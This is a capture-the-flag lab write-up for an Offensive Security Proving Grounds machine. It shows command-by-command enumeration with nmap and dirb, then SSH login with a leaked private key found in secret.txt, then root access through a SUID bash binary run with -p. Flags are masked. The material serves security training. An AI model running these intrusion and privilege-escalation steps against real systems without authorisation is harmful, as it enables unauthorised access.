Details
This box was customized by Offensive Security and integrated into the ‘proving grounds’ lab.
What follows is the solution for the ‘proving grounds’ version.
discovery
Performing a simple nmap scan to identify the attack surface of the target.
portscan
$ nmap -Pn -p- -sV 192.168.59.89
- 22 (OpenSSH)
- 80 (Apache)
- 33060 (unrecognized)
website
Performing simple directory busting on the target.
$ dirb http://192.168.59.89
WordPress seems to be installed on the web server.
Additionally, dirb was able to identify the files robots.txt and secret.txt:
- robots.txt: contains the path /secret.txt
- secret.txt: contains a base64 blob
exploitation
preparing
Save the base64 blob to a file and decode it.
$ base64 -d blob.base64
The decoded output reveals that it is an SSH private key!
Generate the public key from the private key; its comment field gives the username.
$ ssh-keygen -f ssh.priv -y > ssh.pub
The username is oscp.
getting a shell and accessing the first flag
$ ssh -i ssh.priv oscp@192.168.59.89
bash-5.0$ cat local.txt
*******************************
post exploitation
privilege escalation
Identify SUID (and SGID) binaries owned by root.
$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
...
-rwsr-sr-x 1 root root 1183448 Feb 25 2020 /usr/bin/bash
...
The GTFOBins website lists bash: a SUID bash started with -p keeps the elevated effective UID instead of dropping it, so it can be used to gain root access.
-bash-5.0$ /usr/bin/bash -p
bash-5.0# whoami
root
Root!
get the second flag
bash-5.0# cd /root/
bash-5.0# ls
fix-wordpress flag.txt proof.txt snap
bash-5.0# cat flag.txt
Your flag is in another file...
bash-5.0# cat proof.txt
1******************************8
Pwned! <@:-)